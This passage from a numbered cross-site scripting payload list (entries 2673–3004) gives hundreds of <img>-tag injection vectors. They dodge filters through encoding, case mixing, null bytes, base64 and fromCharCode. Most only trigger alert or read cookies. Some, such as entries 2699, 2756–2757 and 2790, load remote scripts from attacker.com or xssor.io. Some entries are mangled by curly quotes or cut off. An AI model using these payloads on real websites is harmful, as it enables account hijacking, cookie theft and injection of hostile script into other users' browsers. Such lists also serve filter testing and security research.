  2673. <img id=XSS SRC=”blah”onmouseover=”alert(‘XSS’);”>
  2674. <IMG id=XSS SRC=”jav
  2675. <IMG id=XSS SRC=`javascript:alert(“RSnake says, ‘XSS’”)`>
  2676. <IMG id=XSS SRC=javascript:alert(String.fromCharCode(88,83,83))>
  2677. <IMG id=XSS SRC=`javascript:alert(“‘XSS’”)`>
  2678. <IMG id=XSS SRC=’javascript:alert(‘XSS’)
  2679. <IMG id=XSS SRC=” javascript:alert(‘XSS’);”>
  2680. <IMG id=XSS SRC=”jav ascript:alert(‘XSS’);”>
  2681. <IMG id=XSS SRC=”jav ascript:alert(‘XSS’);”>
  2682. <IMG id=XSS SRC=”javascript:alert(‘XSS’);”>
  2683. <IMG id=XSS SRC=”javascript:alert(‘XSS’)”
  2684. <IMG id=XSS SRC=javascript:alert(‘XSS’)>
  2685. <IMG id=XSS SRC=javascript:alert(“XSS”)>
  2686. <IMG id=XSS SRC=JaVaScRiPt:alert(‘XSS’)>
  2687. <IMG id=XSS SRC=”livescript:[code]”>
  2688. <IMG id=XSS SRC=”mocha:[code]”>
  2689. <IMG id=XSS SRC=’vbscript:msgbox(“XSS”)’>
  2690. ><img id=XSS SRC=x onerror=alert(XSS);>
  2691. <IMG id=XSS STYLE=”xss:expr/*XSS*/ession(alert(‘XSS’))”>
  2692. <img+<iframe =”1" onerror=”alert(1)”>
  2693. <img language=vbscript src=<b onerror=”alert 1">
  2694. <img language=vbscript src=<b onerror=”alert 1"> // IE 8
  2695. <img language=vbs src=<b onerror=alert#1/1#>
  2696. <img language=vbs src=<b onerror=confirm#1/1#>
  2697. <img longdesc=”src=” images=”” stop.png”=”” onerror=”alert(document.domain);//&quot;” src=”x” alt=”showme”>
  2698. <<img longdesc=”src=’x’onerror=alert(document.domain);//><img “ src=’showme’>
  2699. <img longdesc=”src=’x’onerror=eval(window.atob(‘aW5jbHVkZT1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtpbmNsdWRlLnNyYz0naHR0cHM6Ly9hdHRhY2tlci5jb20vYXRtYWlsLmpzJztkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKGluY2x1ZGUpOw==’));//><img “ src=’showme’>
  2700. <IMG LOW id=XSS SRC=”javascript:alert(‘XSS’)”>
  2701. <IMG LOWid=XSS SRC=”javascript:alert(‘XSS’)”>
  2702. <IMG+LOWSRC=”javascript:alert(1);”>
  2703. <IMG LOWSRC=”javascript:alert(‘XiSS’)”>
  2704. <;IMG LOWSRC=”;javascript:alert(‘;XSS’;);”;>;
  2705. <IMG LOWSRC=”javascript:alert(‘XSS’);”>
  2706. <IMG LOWSRC=”javascript:alert(‘XSS’)”>
  2707. <IMG LOWSRC=\”javascript:alert(‘XSS’)\”>
  2708. <IMG LOWSRC=”javascript:confirm(document.location)”>
  2709. <img LOWSRC=”javascript:document.vulnerable=true;”>
  2710. <IMG LOWSRC=”javascript:javascript:alert(1)”>
  2711. <IMG LOWSRC_NeatHtmlReplace=”javascript:alert(‘XSS’)”>
  2712. ‘“><img onerror=alert(0) src=><”’
  2713. <img onerror=alert(1) src <u></u>
  2714. <img onerror=event.path.pop().alert(1) src>
  2715. <img onerror=”location=’javascript:%61lert(1)’” src=”x”>
  2716. <img onerror=”location=’javascript:=lert(1)’” src=”x”>
  2717. <img onerror=”location=’javascript:\x255Cu0061lert(1)’” src=”x” >
  2718. <img onerror=”location=’javascript:\x2561lert(1)’” src=”x”>
  2719. “/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
  2720. “/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
  2721. “/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
  2722. “/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
  2723. “/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
  2724. “/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
  2725. “/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
  2726. “/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
  2727. “/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
  2728. <img onload=alert(1)>//INJECTX
  2729. ><img onmouseover=alert(Xss)>
  2730. ��><img onmouseover=alert(��Xss��)>
  2731. ><img onmouseover=alert(Xss-By-Muhaddi)>
  2732. <IMG onmouseover=”alert(‘xxs’)”>
  2733. <IMG onmouseover=”alert(“xxs”)”>
  2734. <IMG onmouseover =confirm(1)>
  2735. <;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>;
  2736. <;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>;
  2737. <img =”><script>alert(1)</script>”>
  2738. <img “””><script>alert(“XSS by \nxss”)</script><marquee><h1>XSS by xss</h1></marquee>
  2739. <img><script>alert(‘xss’)</script>”>
  2740. <;IMG “;”;”;>;<;SCRIPT>;alert(“;XSS”;)<;/SCRIPT>;”;>;
  2741. <IMG ><SCRIPT>alert(XSS)</SCRIPT>>
  2742. <IMG “””><SCRIPT>alert(‘XSS’)</SCRIPT>”>
  2743. <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
  2744. <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
  2745. <IMG+SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000039&#0000041>
  2746. <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
  2747. <IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>
  2748. <img/src=`%00` /id=confirm(1) /onerror=eval(id)
  2749. <img/src=%00 id=confirm(1) onerror=eval(id)
  2750. <img src=`%00`&NewLine; onerror=alert(1)&NewLine;
  2751. <img src=`%00`&NewLine; onerror=confirm(1)&NewLine;
  2752. <img/src=`%00` onerror=this.onerror=confirm
  2753. <img/src=`%00` onerror=this.onerror=confirm(1)
  2754. <img/src=`%00` onerror=this.onerror=confirm(1)
  2755. <img src=&#04jav&#13;ascr&#09;ipt:al&#13;ert(0)>
  2756. <img src=&#04jav&#13;ascr&#09;ipt:i=”x=docu&#13;ment.createElement(‘\u0053\u0043\u0052\u0049\u0050\u0054’);x.src=’http://xssor.io/xn.js';x.defer=true;doc&#13;ument.getElementsByTagName('head')[0].appendChild(x)";execScri&#13;pt(i)>
  2757. <img src=&#04jav&#13;ascr&#09;ipt:i=”x=document.createElement(‘script’);x.src=’http://xssor.io/xn.js';x.defer=true;document.getElementsByTagName('head')[0].appendChild(x)";execScript(i)>
  2758. <img src=’0' onerror=with(document)body.appendChild(createElement(‘script’)).src=’domain.js’>
  2759. \”><img Src=0x94 onerror=alert(0x000123)>
  2760. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
  2761. <IMG+SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#39;&#41;>
  2762. <img src=”&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;”>
  2763. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41>
  2764. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
  2765. IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
  2766. <IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41>
  2767. <;IMG SRC=”; &;#14; javascript:alert(‘;XSS’;);”;>;
  2768. <IMG SRC=” &#14; javascript:alert(‘XSS’);”>
  2769. <IMG SRC=” &#14; javascript:alert(‘XSS’);”>
  2770. <IMG SRC=” &#14; javascript:confirm(document.location);”>
  2771. <img SRC=” &#14; javascript:document.vulnerable=true;”>
  2772. <img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
  2773. <img src=1 href=1 onerror=”javascript:alert(1)”></img>
  2774. <img src=1 href=1 onerror=”javascript:alert(document.domain)”></img>
  2775. <iMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)>
  2776. <img src=’1' onerror=’alert(0)’ <
  2777. <img src=’1' onerror/=alert(0) />
  2778. <img src=’1'’onerror=’alert(0)’>
  2779. <img src=’1'”onerror=”alert(0)”>
  2780. <img src=’1'onerror=alert(0)>
  2781. <img/src=’1'/onerror=alert(0)>
  2782. <img src=”1" onerror=”alert(‘1’)”>
  2783. <img src=”1" onerror=”alert(1)” />
  2784. <img src=1 onerror=alert(1)>
  2785. “]<img src=1 onerror=alert(1)>
  2786. “><img src=1 onerror=alert(1)>.gif
  2787. <img src=1 onerror=”alert(52)”
  2788. <img src=1 onerror=alert(document.domain)>
  2789. “]<img src=1 onerror=confirm(1)>
  2790. <img src=1 onerror=’document.write(eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,4747,97,116,116,97,99,107,101,114,46,99,111,109,47,99,111,100,101,46,106,115,34,62,60,47,115,99,114,105,112,116,62,39,41,59)));’>
  2791. <img src=1 onerror=Function(“aler”+”t(documen”+”t.domain)”)()>
  2792. /#<img src=1 onerror=javascript:confirm(3)>
  2793. <img src=1 onerror=jQuery.getScript(“domain.js”)>
  2794. <img src=’1' onerror=\x00alert(0) />
  2795. <img src=’1' onerror\x00=alert(0) />
  2796. <img src=’1' onerror\x0b=alert(0) />
  2797. <img src=”1" onerror=”&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;” />
  2798. <img src=”1" onnerror=”alert(1)”>
  2799. <img src=’1' o\x00nerr\x00or=alert(0) />
  2800. <img src=1 style=”font-fam\22onerror\3d alert\28 1\29\20 ily:’aaa’;\”>
  2801. <img src=’1'\x00onerror=alert(0)>
  2802. <img/src=@&#32;&#13; onerror = prompt(‘&#49;’)
  2803. <img src=”5" onerror=eval(“\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29”)></img>
  2804. <img src=”5"onerror=eval(“\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29”)></img>
  2805. <img src=”a”
  2806. <img/src=aaa.jpg onerror=prompt(1);
  2807. <img/src=aaa.jpg onerror=prompt(1);>
  2808. <img/src=aaa.jpg onerror=prompt(1);
  2809. /> <img src=’aaa’ onerror=confirm(document.domain)>
  2810. “/> <img src=’aaa’ onerror=confirm(document.domain)>
  2811. <img src=��\����<a href=’��>����onerror=alert(9)>
  2812. <img/src=”.”alt=””onerror=”alert(‘zombie’)”/>
  2813. <img src=��\��a=��>��onerror=alert(9)>
  2814. <img src=”a” onerror=’eval(atob(“cHJvbXB0KDEpOw==”))’>
  2815. <img src=a onerror=eval(String.fromCharCode(97,108,101,114,116,40,39,67,104,101,97,116,115,111,110,39,41))>
  2816. <img src=a onerror=setInterval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))>
  2817. <img src=a onerror=setInterval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))> // Using String.fromcharcode function
  2818. <img src=asdf onerror=alert(document.cookie)>
  2819. <img src attribute src=”data:image/svg+xml;base64,
  2820. <img src=”blah>” onmouseover=”document.vulnerable=true;”>
  2821. <img src=”blah”onmouseover=”document.vulnerable=true;”>
  2822. <img src=<b onerror=alert(‘renwax23’);>
  2823. <img src=data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs= onload=alert(1)>
  2824. <img src=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==”>
  2825. <img / src = \ ‘dfdfd \’ // onerror = \ ‘alert (document.cookie) \ ‘>
  2826. <img src=&{document.vulnerable=true;};>
  2827. <img src=evil.swf>
  2828. <img src=foo.png onerror=alert(/xssed/) />
  2829. <img src=foo.png onerror=alert(/xssed/) />
  2830. <img src=http://127.0.0.1/myspace.asp>
  2831. <img/src=’http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
  2832. <img+src=”http://localhost">
  2833. <img src=”http://teamultimate.in/wp-content/uploads/2017/03/slide-main.png">
  2834. <img src=��http://victim/newUser?name=<script>alert(1)</script>��/>
  2835. <img src=http://victim/newUser?name=<script>alert(1)</script>/>
  2836. <img src=”http://www.baidu.com/img/bdlogo.gif">
  2837. <img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #
  2838. <img src=http://www.google.fr/images/srpr/logo3w.png onload=confirm(this.ownerDocument.cookie) width=0 height= 0 /> #
  2839. <img src=”http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor.jpg">
  2840. <IMG src=”http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
  2841. <;IMG SRC=”;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>;
  2842. <IMG SRC=”http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
  2843. <img src=”http://www.w3schools.com/tags/planets.gif" width=”145" height=”126" alt=”Planets” usemap=”#planetmap”><map name=”planetmap”><area shape=”rect” coords=”0,0,145,126" a-=”>” href=”j&#x61;vascript:&#x61;lert(-1)”></map>
  2844. <img src=������id=’<img src=����>��onerror=alert(9)>
  2845. <img src=��<img src=’<img src=.>��>��onerror=alert(9)>
  2846. <! — <img src=” →<img src=x onerror=alert(1)//”>
  2847. <![><img src=”]><img src=x onerror=alert(1)//”>
  2848. <! — <img src=” →<img src=x onerror=alert(123)//”>
  2849. <! — <img src=” →<img src=x onerror=alert(1)//”>//INJECTX
  2850. <! — <img src=” →<img src=x onerror=alert(XSS)//”>
  2851. <![><img src=”]><img src=x onerror=alert(XSS)//”>
  2852. <! — <img src=” →<img src=x onerror=javascript:alert(1)//”>
  2853. <![><img src=”]><img src=x onerror=javascript:alert(1)//”>
  2854. <img src=i onerror=eval(jQuery.getScript(‘domain.js’))>
  2855. <img src ?itworksonchrome?\/onerror = alert(1)>
  2856. <img src ?itworksonchrome?\/onerror = alert(1)
  2857. <img src ?itworksonchrome?\/onerror = alert(1)???
  2858. <img src ?itworksonchrome?\/onerror = alert(1)
  2859. <img src ?itworksonchrome?\/onerror = confirm(1)???
  2860. <img src ?itworksonchrome?\/onerror = confirm(1)
  2861. <img src=”jar:!/”>
  2862. <IMG+SRC=”jav%09ascript:alert(1);”>
  2863. <IMG+SRC=”jav%0dascript:alert(1);”>
  2864. <IMG SRC=java%00script:confirm(document.location)>
  2865. “<IMG src=java\0script:alert(\”XSS\”)>”;’ > out
  2866. <iMgSRC = “JavaScript:alert(0);”>
  2867. <img src=”javascript:alert(1)”>
  2868. <IMG SRC=&{javascript:alert(1);};>
  2869. <img src=”java&#script:alert(/1231/);”>
  2870. <img src=”javascript:alert(2)”>
  2871. ?img src=javascript:alert(document.domain)//.swf ?
  2872. <img src=javascript:alert(&quot;XSS&quot;)>
  2873. <;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>;
  2874. <IMG SRC=javascript:alert(&quot;XSS&quot;)>
  2875. <IMG SRC=JaVaScRiPt:alert(&quot;XSS&quot;)>
  2876. <IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)>
  2877. <;IMG SRC=`javascript:alert(“;RSnake says, ‘;XSS’;”;)`>;
  2878. <IMG SRC=`javascript:alert(“RSnake says, ‘XSS’”)`>
  2879. <IMG SRC=`javascript:alert(“RSnake says### ‘XSS’”)`>
  2880. <IMG SRC=javascript:alert(String.fromCharCode(88
  2881. <;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>;
  2882. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  2883. <IMG SRC=javascript:alert(String.fromCharCode(88###83###83))>
  2884. <IMG src=”javascript:alert(‘X13SS’)”
  2885. <IMG src=”jav ascript:alert(‘XaSS’);”>
  2886. <IMG src=”jav ascript:alert(‘XbSS’);”>
  2887. <IMG src=”jav ascript:alert(‘XcSS’);”>
  2888. <IMG src=” javascript:alert(‘XdSS’);”>
  2889. <img src=”javascript:alert(‘XSS’);”>
  2890. <img src=”javascript:alert(‘XSS’)”>
  2891. <IMG src=”javascript:alert(‘XSS’);”>
  2892. <IMG src=javascript:alert(‘XSS’)>
  2893. <IMG src=JaVaScRiPt:alert(‘XSS’)>
  2894. <IMG src=JaVaScRiPt:alert(“XSS”)>
  2895. <;IMG SRC=”;javascript:alert(‘;XSS’;);”;>;
  2896. <;IMG SRC=”;javascript:alert(‘;XSS’;)”;
  2897. <;IMG SRC=javascript:alert(‘;XSS’;)>;
  2898. <IMG SRC=” javascript:alert(‘XSS’);”>
  2899. <IMG SRC=” javascript:alert(‘XSS’);”>
  2900. <IMG SRC=”jav ascript:alert(‘XSS’);”>
  2901. <IMG SRC=”jav ascript:alert(‘XSS’);”>
  2902. <IMG SRC=”jav ascript:alert(‘XSS’);”>
  2903. <IMG SRC=”jav ascript:alert(‘XSS’);”>
  2904. <IMG SRC=”javascript:alert(‘XSS’);”>
  2905. <IMG SRC=”javascript:alert(‘XSS’)”
  2906. <IMG SRC=jav ascript:alert(XSS);>
  2907. <IMG SRC=javascript:alert(‘XSS’)>
  2908. <IMG SRC=javascript:alert(“XSS”)>
  2909. <IMG SRC=javascript:alert(XSS)>
  2910. <IMG SRC=javascript:alert(XSS);>
  2911. <IMG SRC=javascript:alert(XSS)
  2912. <IMG SRC = “ j a v a s c r i p t : a l e r t ( ‘ X S S ‘ ) “ >
  2913. <IMGSRC=”javascript:alert(‘XSS’)”>
  2914. IMG SRC=”javascript:alert(‘XSS’);”>
  2915. <IMG SRC=jAVasCrIPt:alert(XSS)>
  2916. <;IMG SRC=JaVaScRiPt:alert(‘;XSS’;)>;
  2917. <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
  2918. <IMG SRC=JaVaScRiPt:alert(“XSS”)>
  2919. <IMG SRC=`javascript:confirm(1)`>
  2920. <IMG SRC=`javascript:confirm(document.cookie)`>
  2921. <IMG SRC=”jav ascript:confirm(document.location);”>
  2922. <IMG SRC=”javascript:confirm(document.location);”>
  2923. <IMG SRC=”javascript:confirm(document.location)”
  2924. <IMG SRC=javascript:confirm(document.location)>
  2925. <IMG SRC=JaVaScRiPt:confirm(document.location)>
  2926. <IMG SRC=javascript:confirm(&quot;XSS&quot;)>
  2927. <IMG SRC=JaVaScRiPt:confirm(&quot;XSS<WBR>&quot;)>
  2928. <IMG SRC=javascript:confirm(String.fromCharCode(88,83,83))>
  2929. <img src=”javascript:document.vulnerable=true;”>
  2930. <img SRC=”jav ascript:document.vulnerable=true;”>
  2931. <img SRC=”javascript:document.vulnerable=true;”>
  2932. <img SRC=”javascript:document.vulnerable=true;”
  2933. <IMG SRC=`javascriptGalert(“)`>
  2934. <IMG SRC=`javascriptGalert(“Look its, ‘XSS’”)`>
  2935. <IMG SRC=`javascriptGalert(\”XSS\”)`>
  2936. <IMG SRC=`javascript:javascript:alert(1)`>
  2937. <IMG SRC=”jav ascript:javascript:alert(1);”>
  2938. <IMG SRC=”jav ascript:javascript:alert(1);”>
  2939. <IMG SRC=”jav ascript:javascript:alert(1);”>
  2940. <IMG SRC=”jav ascript:javascript:alert(1);”>
  2941. <IMG SRC=”javascript:javascript:alert(1);”>
  2942. <IMG SRC=”javascript:javascript:alert(1)”
  2943. <IMG SRC=javascript:javascript:alert(1)>
  2944. <IMG SRC=javascript:prompt(document.location)>
  2945. <IMG SRC=JaVaScRiPt:prompt(document.location)>
  2946. <img src=javascript:while([{}]);>
  2947. “><img src=javascript:while([{}]);>
  2948. <IMG SRC=javascrscriptipt:alert(‘XSS’)>
  2949. <img src=javcript:alert(/1231/);>
  2950. <IMG SRC=jav..?..S’)>
  2951. <IMG+SRC=”jav&#x09;ascript:alert(1);”>
  2952. <IMG SRC=”jav&#x09;ascript:alert(<WBR>’XSS’);”><IMG SRC=”jav&#x0A;ascript:alert(<WBR>’XSS’);”><IMG SRC=”jav&#x0D;ascript:alert(<WBR>’XSS’);”>
  2953. <;IMG SRC=”;jav&;#x09;ascript:alert(‘;XSS’;);”;>;
  2954. <;IMG SRC=”;jav&#x09;ascript:alert(‘;XSS’;);”;>;
  2955. <IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”>
  2956. <IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”>
  2957. <IMG SRC=\”jav&#x09;ascript:alert(‘XSS’);\”>
  2958. <IMG SRC=jav&#x09;ascript:alert(XSS);>
  2959. <IMG SRC=”jav&#x09;ascript:confirm(document.location);”>
  2960. <IMG SRC=”jav&#x09;ascript:confirm(<WBR>document.location);”>
  2961. <IMG+SRC=”jav&#x0A;ascript:alert(1);”>
  2962. <IMG SRC=”jav&#x0A;ascript:alert(<WBR>’XSS’);”>
  2963. <;IMG SRC=”;jav&;#x0A;ascript:alert(‘;XSS’;);”;>;
  2964. <IMG SRC=”jav&#x0A;ascript:alert(‘XSS’);”>
  2965. <IMG SRC=”jav&#x0A;ascript:alert(‘XSS’);”>
  2966. <IMG SRC=\”jav&#x0A;ascript:alert(‘XSS’);\”>
  2967. <IMG SRC=”jav&#x0A;ascript:confirm(document.location);”>
  2968. <IMG SRC=”jav&#x0A;ascript:confirm(<WBR>document.location);”>
  2969. <IMG+SRC=”jav#x0D;ascript:alert(1);”>
  2970. <IMG SRC=”jav&#x0D;ascript:alert(<WBR>’XSS’);”>
  2971. <;IMG SRC=”;jav&;#x0D;ascript:alert(‘;XSS’;);”;>;
  2972. <IMG SRC=”jav&#x0D;ascript:alert(‘XSS’);”>
  2973. <IMG SRC=”jav&#x0D;ascript:alert(‘XSS’);
  2974. <IMG SRC=\”jav&#x0D;ascript:alert(‘XSS’);\”>
  2975. <IMG SRC=”jav&#x0D;ascript:confirm(document.location);”>
  2976. <IMG SRC=”jav&#x0D;ascript:confirm(<WBR>document.location);”>
  2977. <IMG+SRC=j&#X41vascript:alert(1)>
  2978. <IMG src=”livescript:[code]”>
  2979. <;IMG SRC=”;livescript:[code]”;>;
  2980. <IMG SRC=”livescript:[code]”>
  2981. <IMG SRC=”livescript:[code][/code]”>
  2982. <IMG SRC=”livescript:[code]”> (netscape only)
  2983. <img src=”livescript:document.vulnerable=true;”>
  2984. <img src=”Mario Heiderich says that svg SHOULD not be executed trough image tags” onerror=”javascript:document.write(‘\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e’);”></img>
  2985. <img/src=”mars.png”alt=”mars”>
  2986. <IMG src=”mocha:[code]”>
  2987. <;IMG SRC=”;mocha:[code]”;>;
  2988. <IMG SRC=”mocha:[code]”>
  2989. <IMG SRC=”mocha:[code]”> (netscape only)
  2990. <img src=”mocha:document.vulnerable=true;”>
  2991. #”><img src=M onerror=alert(‘XSS’);>
  2992. <IMG SRC_NeatHtmlReplace=” &#14; javascript:alert(‘XSS’);”>
  2993. <IMG SRC_NeatHtmlReplace=”http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
  2994. <IMG SRC_NeatHtmlReplace=”javascript:alert(&quot;XSS&quot;)”>
  2995. <IMG SRC_NeatHtmlReplace=”javascript:alert(String.fromCharCode(88,83,83))”>
  2996. <IMG SRC_NeatHtmlReplace=” j a v a s c r i p t : a l e r t ( ‘ X S S ‘ ) “ >
  2997. <IMG SRC_NeatHtmlReplace=”javascript:alert(‘XSS’);”>
  2998. <IMG SRC_NeatHtmlReplace=”javascript:alert(‘XSS’)”>
  2999. <IMG SRC_NeatHtmlReplace=”JaVaScRiPt:alert(‘XSS’)”>
  3000. <IMG SRC_NeatHtmlReplace=”jav&#x09;ascript:alert(‘XSS’);”>
  3001. <IMG SRC_NeatHtmlReplace=”jav&#x0A;ascript:alert(‘XSS’);”>
  3002. <IMG SRC_NeatHtmlReplace=”jav&#x0D;ascript:alert(‘XSS’);”>
  3003. <IMG SRC_NeatHtmlReplace=”livescript:[code]”>
  3004.  
